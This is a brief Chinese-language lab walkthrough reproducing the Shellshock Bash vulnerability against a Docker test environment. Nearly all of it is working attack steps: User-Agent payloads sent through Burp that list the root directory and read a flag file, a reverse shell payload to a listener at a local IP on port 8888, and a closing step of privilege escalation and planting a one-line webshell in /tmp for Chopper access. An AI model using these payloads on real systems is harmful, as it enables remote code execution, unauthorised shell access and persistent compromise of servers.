漏洞复现-Bash之一键破壳

 

 

注：使用docker搭建测试环境

（1）访问搭建的环境网址：http://192.168.11.101:8081/

（2）使用burp拦截数据包，并修改User-Agent的内容：

 

 

（3）使用如下payload：

() { :;};echo ; echo $(/bin/ls -al /);

 

（4）现在我们cat flag一下

() { :;};echo ; echo $(/bin/cat /flag /);

 

（5）反弹shell到本机电脑，使用nc监听本机8888端口，输入如下payload：

本机运行nc

nc -lp 8888

   

 User-Agent：

() { :; }; /bin/bash -i >& /dev/tcp/192.168.11.230/8888 0>&1;

 

 

（6）提权，使用各种提权方式进行，在tmp目录下写一句话木马，进行菜刀连接